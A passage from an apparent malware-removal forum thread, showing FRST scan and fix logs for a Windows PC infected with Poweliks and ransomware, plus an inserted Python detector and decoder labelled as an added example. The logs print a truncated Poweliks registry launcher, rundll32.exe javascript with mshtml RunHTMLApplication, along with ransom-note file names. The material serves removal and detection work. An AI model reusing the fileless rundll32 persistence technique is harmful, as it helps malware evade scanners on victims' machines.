Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Loaded Modules (whitelisted) =============

2012-12-06 15:54 - 2012-08-31 15:01 - 00151552 _____ () C:\Windows\System32\HP1100LM.DLL
2013-02-27 16:16 - 2011-12-12 11:48 - 00014616 _____ () C:\Windows\System32\sphonepdfmonpro.dll
2012-12-06 15:54 - 2012-08-31 15:01 - 00069632 _____ () C:\Windows\system32\spool\PRTPROCS\W32X86\HP1100PP.DLL
2010-09-27 11:03 - 2010-09-27 11:03 - 00201512 _____ () C:\Windows\system32\vpnapi.dll
2012-12-06 15:54 - 2012-08-31 15:02 - 02306048 _____ () C:\Windows\system32\spool\DRIVERS\W32X86\3\hp1100su.dll
2012-12-06 15:54 - 2012-08-31 15:01 - 00794624 _____ () C:\Windows\system32\spool\DRIVERS\W32X86\3\HP1100GC.dll
2014-07-23 15:13 - 2014-05-27 07:24 - 00434512 _____ () C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\AeXWiseRuleProvider.dll
2012-05-31 10:26 - 2012-02-17 19:55 - 00166912 _____ () C:\Program Files\WinRAR\rarext.dll
2011-08-31 19:13 - 2011-08-31 19:13 - 00094208 _____ () C:\Windows\System32\IccLibDll.dll
2014-10-30 14:19 - 2014-10-30 14:19 - 03649648 _____ () C:\Program Files\Mozilla Firefox\mozjs.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\Users\scalac\Downloads\launch (1).ica:icasource
AlternateDataStreams: C:\Users\scalac\Downloads\launch.ica:icasource

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\42665744.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\42665744.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepMasterService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: BeFrugal.com Service => 2
MSCONFIG\Services: O2FLASH => 2
MSCONFIG\Services: O2SDIOAssist => 2
MSCONFIG\Services: SP350.PriorityPolicer => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^VPN Client.lnk => C:\Windows\pss\VPN Client.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AIM for Windows => "C:\Users\scalac\AppData\Local\AOL\AIM\aim.exe"
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner.exe" /MONITOR
MSCONFIG\startupreg: Nuvshot.exe => C:\Users\scalac\AppData\Local\NEC\UC700\Nuvshost.exe
MSCONFIG\startupreg: UC700.exe => C:\Users\scalac\AppData\Local\NEC\UC700\UC700.exe -SystemStartup

========================= Accounts: ==========================

Administrator (S-1-5-21-1213310510-1649243033-3905780855-500 - Administrator - Enabled) => C:\Users\Administrator
Guest (S-1-5-21-1213310510-1649243033-3905780855-501 - Limited - Disabled)
sradmin (S-1-5-21-1213310510-1649243033-3905780855-1001 - Limited - Enabled)

==================== Faulty Device Manager Devices =============

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Cisco Systems VPN Adapter
Description: Cisco Systems VPN Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Cisco Systems
Service: CVirtA
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (11/03/2014 11:10:18 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.Windows.Common-Controls,language="*",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0"1".
Dependent Assembly Microsoft.Windows.Common-Controls,language="*",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (11/03/2014 11:09:17 AM) (Source: SideBySide) (EventID: 9) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
The manifest file root element must be assembly.

Error: (11/03/2014 11:09:16 AM) (Source: SideBySide) (EventID: 9) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
The manifest file root element must be assembly.

Error: (11/03/2014 08:33:10 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 05:01:47 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe" -Embedding; Description = Configured Microsoft Office Standard 2010; Error = 0x8007043c).

Error: (10/31/2014 05:01:23 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 04:03:10 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 02:24:06 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 10:36:59 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x541b6f63
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x773ed5ff
Faulting process id: 0x3028
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/31/2014 10:36:58 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x541b6f63
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x773ed5ff
Faulting process id: 0x3d0c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3


System errors:
=============
Error: (11/03/2014 11:34:58 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/03/2014 11:33:11 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1058) (User: NUVT)
Description: The processing of Group Policy failed. Windows attempted to read the file \\nuvt.com\SysVol\nuvt.com\Policies\{9BB0F799-6A0C-44B0-842C-F242955AF0C8}\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following:
a) Name Resolution/Network Connectivity to the current domain controller.
b) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller).
c) The Distributed File System (DFS) client has been disabled.

Error: (11/03/2014 11:33:11 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1058) (User: NT AUTHORITY)
Description: The processing of Group Policy failed. Windows attempted to read the file \\nuvt.com\SysVol\nuvt.com\Policies\{9BB0F799-6A0C-44B0-842C-F242955AF0C8}\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following:
a) Name Resolution/Network Connectivity to the current domain controller.
b) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller).
c) The Distributed File System (DFS) client has been disabled.

Error: (11/03/2014 10:08:49 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: NT AUTHORITY)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.

Error: (11/03/2014 08:50:39 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: NUVT)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.

Error: (11/03/2014 08:35:04 AM) (Source: TermService) (EventID: 1067) (User: )
Description: The terminal server cannot register 'TERMSRV' Service Principal Name to be used for server authentication. The following error occured: The specified domain either does not exist or could not be contacted.
.

Error: (11/03/2014 08:32:49 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1055) (User: NT AUTHORITY)
Description: The processing of Group Policy failed. Windows could not resolve the computer name. This could be caused by one of more of the following:
a) Name Resolution failure on the current domain controller.
b) Active Directory Replication Latency (an account created on another domain controller has not replicated to the current domain controller).

Error: (11/03/2014 08:32:49 AM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: This computer was not able to set up a secure session with a domain
controller in domain NUVT due to the following:
%%1311

This may lead to authentication problems. Make sure that this
computer is connected to the network. If the problem persists,
please contact your domain administrator.



ADDITIONAL INFO

If this computer is a domain controller for the specified domain, it
sets up the secure session to the primary domain controller emulator in the specified
domain. Otherwise, this computer sets up the secure session to any domain controller
in the specified domain.

Error: (10/31/2014 05:14:40 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error:
%%1068

Error: (10/31/2014 05:14:35 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error:
%%1068


Microsoft Office Sessions:
=========================
Error: (11/03/2014 11:10:18 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.Windows.Common-Controls,language="*",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0"c:\program files\O2Micro\Oz600\DPInst64.exe

Error: (11/03/2014 11:09:17 AM) (Source: SideBySide) (EventID: 9) (User: )
Description: C:\Users\scalac\AppData\Local\NEC\UC700 Outlook Calendar Link\adxloader.dll.ManifestC:\Users\scalac\AppData\Local\NEC\UC700 Outlook Calendar Link\adxloader.dll.Manifest2

Error: (11/03/2014 11:09:16 AM) (Source: SideBySide) (EventID: 9) (User: )
Description: C:\Users\scalac\AppData\Local\NEC\UC700 Office Smart Tag\adxloader.dll.ManifestC:\Users\scalac\AppData\Local\NEC\UC700 Office Smart Tag\adxloader.dll.Manifest2

Error: (11/03/2014 08:33:10 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 05:01:47 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe" -EmbeddingConfigured Microsoft Office Standard 20100x8007043c

Error: (10/31/2014 05:01:23 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 04:03:10 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 02:24:06 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 10:36:59 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.17344541b6f63unknown0.0.0.000000000c0000005773ed5ff302801cff52035112981C:\Program Files\Internet Explorer\iexplore.exeunknownbff1eb06-6113-11e4-81a5-d067e5567e93

Error: (10/31/2014 10:36:58 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.17344541b6f63unknown0.0.0.000000000c0000005773ed5ff3d0c01cff520459c5514C:\Program Files\Internet Explorer\iexplore.exeunknownbfbc843e-6113-11e4-81a5-d067e5567e93


==================== Memory info ===========================

Processor: Intel® Core™ i5-2540M CPU @ 2.60GHz
Percentage of memory in use: 63%
Total physical RAM: 3241.05 MB
Available physical RAM: 1197.61 MB
Total Pagefile: 6311.35 MB
Available Pagefile: 4505.48 MB
Total Virtual: 2047.88 MB
Available Virtual: 1890.12 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:232.79 GB) (Free:187 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 232.9 GB) (Disk ID: 90158E44)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=232.8 GB) - (Type=07 NTFS)

==================== End Of Log ============================
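The localserver32 entry FRST flagged with "<==== Poweliks?" in the log above is the persistence this thread is chasing. The class is registered under the user's own HKU\...\_Classes hive, which takes precedence over the machine-wide registration of the same CLSID for that user, and its LocalServer32 command is not an executable but `rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";...`, so COM starts rundll32, rundll32 loads mshtml.dll, and the rest of the argument runs as script inside rundll32. Nothing has to exist on disk, which is why ending the process trees and running file scanners did not help. The stored script is obfuscated by shifting every character up by one code point: `epdvnfou/xsjuf` is `document.write`. The Python below is an added example, not something posted in the thread and not part of FRST or any other tool named here. It decodes the visible prefix and scans FRST-style CustomCLSID lines for the rundll32/javascript launcher. The two sample lines are copied from the log above; the encoded string is only the 37 characters FRST printed, and the 247 elided characters are not reconstructed.

```python
"""Decode the Poweliks character-shift payload and flag hijacked CLSID entries in FRST output.

Added example for this thread; not from the thread itself or from FRST."""
import re

# Constructed sample: two CustomCLSID lines copied from the FRST log above. The second one
# is truncated exactly as FRST printed it; the first is a benign entry for contrast.
SAMPLE_FRST_LINES = [
    r"CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{AA073870-297C-3996-B178-D92EBF4A820F}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)",
    r'CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?',
]

# FRST line shape: CustomCLSID: <hive>\CLSID\{guid}\<InprocServer32|LocalServer32> -> <value>
ENTRY_RE = re.compile(
    r"^CustomCLSID:\s+(?P<hive>\S+?)\\CLSID\\(?P<clsid>\{[0-9A-Fa-f-]{36}\})\\(?P<server>\w+)\s+->\s+(?P<value>.*)$"
)
# rundll32 given a javascript: URL loads mshtml.dll and runs the script via RunHTMLApplication.
LAUNCHER_RE = re.compile(r"rundll32(?:\.exe)?\s+javascript:", re.IGNORECASE)
# The obfuscated script is the first argument to eval(""). An encoded string never contains a
# space (space is stored as "!"), so stopping at whitespace also drops FRST's truncation note.
ENCODED_RE = re.compile(r'eval\("([^"\s]+)')


def shift_decode(encoded: str, shift: int = 1) -> str:
    """Reverse the Poweliks obfuscation: each character was stored with its code point
    raised by `shift`, so subtracting it restores the original script text."""
    return "".join(chr(ord(ch) - shift) for ch in encoded)


def parse_custom_clsid(line: str):
    """Split one FRST CustomCLSID line into hive, clsid, server type and value, or None."""
    m = ENTRY_RE.match(line.strip())
    return m.groupdict() if m else None


def is_poweliks_launcher(entry) -> bool:
    """LocalServer32 is the command COM runs to start an out-of-process server. A legitimate
    one names an executable; Poweliks points it at rundll32 with a javascript: argument."""
    return entry["server"].lower() == "localserver32" and bool(LAUNCHER_RE.search(entry["value"]))


def find_poweliks(lines):
    """Return the hijacked entries, each with the decoded script prefix attached."""
    hits = []
    for line in lines:
        entry = parse_custom_clsid(line)
        if entry and is_poweliks_launcher(entry):
            m = ENCODED_RE.search(entry["value"])
            entry["decoded_prefix"] = shift_decode(m.group(1)) if m else None
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in find_poweliks(SAMPLE_FRST_LINES):
        print(hit["clsid"], hit["server"])
        print("  launcher:", hit["value"][:60])
        print("  decoded :", hit["decoded_prefix"])
```

Run as-is it reports the one hijacked CLSID with the decoded prefix `document.write('<script language=jscr`; to check a full log, pass `open("FRST.txt", encoding="utf-8").read().splitlines()` to `find_poweliks`. The DCOM error 10010 in the System log section above names the same CLSID, which is consistent with COM launching that LocalServer32 command and the rundll32 script never registering itself as a COM server; that event is a useful secondary indicator when the registry value itself has already been cleared and the log is all that is left.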



#7 Shate' (Topic Starter, Members, 72 posts)

Posted 03 November 2014 - 12:38 PM

Hi Georgi

Thank you.

The only way it would let me post is if I ended the process trees and quickly copied and pasted.



#8 B-boy/StyLe/ (Bleepin' Freestyler, Malware Response Team, 8,307 posts, Bulgaria)

Posted 03 November 2014 - 01:38 PM

Hi,

Please download the following file => [attachment=157255:fixlist.txt] and save it to the Desktop.
NOTE: It's important that both files, FRST and fixlist.txt, are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it in your reply.

Regards,

Georgi




#9 Shate' (Topic Starter, Members, 72 posts)

Posted 03 November 2014 - 03:43 PM

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 02-11-2014
Ran by ScalaC at 2014-11-03 15:01:49 Run:1
Running from C:\Users\scalac\Desktop
Loaded Profile: ScalaC (Available profiles: Administrator & ScalaC)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
start
CloseProcesses:
HKU\S-1-5-19\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-20\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-21-19809612-450918713-1538882281-38475\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-21-19809612-450918713-1538882281-38475\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-19809612-450918713-1538882281-38475\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-31] ()
C:\Windows\System32\drivers\TrueSight.sys
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\scalac\Downloads\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\scalac\Documents\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\scalac\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\scalac\Downloads\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\scalac\Documents\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\scalac\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\scalac\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\scalac\Downloads\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\scalac\Documents\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\INSTALL_TOR.URL
2014-10-30 20:08 - 2014-10-30 20:08 - 00008510 _____ () C:\Users\scalac\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:08 - 2014-10-30 20:08 - 00008510 _____ () C:\Users\scalac\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:08 - 2014-10-30 20:08 - 00008510 _____ () C:\Users\scalac\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:08 - 2014-10-30 20:08 - 00004192 _____ () C:\Users\scalac\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:08 - 2014-10-30 20:08 - 00004192 _____ () C:\Users\scalac\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:08 - 2014-10-30 20:08 - 00004192 _____ () C:\Users\scalac\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:08 - 2014-10-30 20:08 - 00000268 _____ () C:\Users\scalac\AppData\Roaming\INSTALL_TOR.URL
2014-10-30 20:08 - 2014-10-30 20:08 - 00000268 _____ () C:\Users\scalac\AppData\Local\INSTALL_TOR.URL
2014-10-30 20:08 - 2014-10-30 20:08 - 00000268 _____ () C:\Users\scalac\AppData\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\AppData\Roaming\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\AppData\Local\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\AppData\INSTALL_TOR.URL
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\Users\Administrator\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\Users\Administrator\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\Users\Administrator\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\Users\Administrator\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\Users\Administrator\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\Users\Administrator\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\Users\Administrator\INSTALL_TOR.URL
2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\Users\Administrator\AppData\Local\INSTALL_TOR.URL
2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\Users\Administrator\AppData\INSTALL_TOR.URL
2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\ProgramData\INSTALL_TOR.URL
2014-10-30 20:03 - 2014-10-30 20:03 - 00000424 _____ () C:\ProgramData\@system.temp
2014-10-30 20:03 - 2014-10-30 20:03 - 00000160 ____H () C:\ProgramData\@system3.att
2014-10-30 20:03 - 2014-10-30 20:03 - 00000000 ____D () C:\Users\scalac\AppData\Roaming\FrameworkUpdate7
2014-10-29 11:37 - 2014-10-29 16:43 - 00087200 _____ () C:\ProgramData\wrnhoah.tmp
2014-10-24 10:57 - 2014-10-24 10:57 - 00001368 _____ () C:\ProgramData\@system.att
2014-10-24 10:54 - 2014-10-24 10:57 - 00001104 ____H () C:\ProgramData\@system2.att
2014-10-24 10:54 - 2014-10-24 10:54 - 00000448 ____H () C:\Users\scalac\AppData\Roaming\麽鎒駓覜
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\42665744.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\42665744.sys => ""="Driver"
emptytemp:
end
*****************

Processes closed successfully.
HKU\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value deleted successfully.
HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value deleted successfully.
HKU\S-1-5-21-19809612-450918713-1538882281-38475\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value deleted successfully.
"HKU\S-1-5-21-19809612-450918713-1538882281-38475\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key deleted successfully.
"HKU\S-1-5-21-19809612-450918713-1538882281-38475\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
HKU\S-1-5-18\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value deleted successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
"HKU\S-1-5-21-19809612-450918713-1538882281-38475\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
TrueSight => Service deleted successfully.
C:\Windows\System32\drivers\TrueSight.sys => Moved successfully.
C:\Users\scalac\Downloads\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\scalac\Documents\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\scalac\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\scalac\Downloads\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\scalac\Documents\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\scalac\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\scalac\INSTALL_TOR.URL => Moved successfully.
C:\Users\scalac\Downloads\INSTALL_TOR.URL => Moved successfully.
C:\Users\scalac\Documents\INSTALL_TOR.URL => Moved successfully.
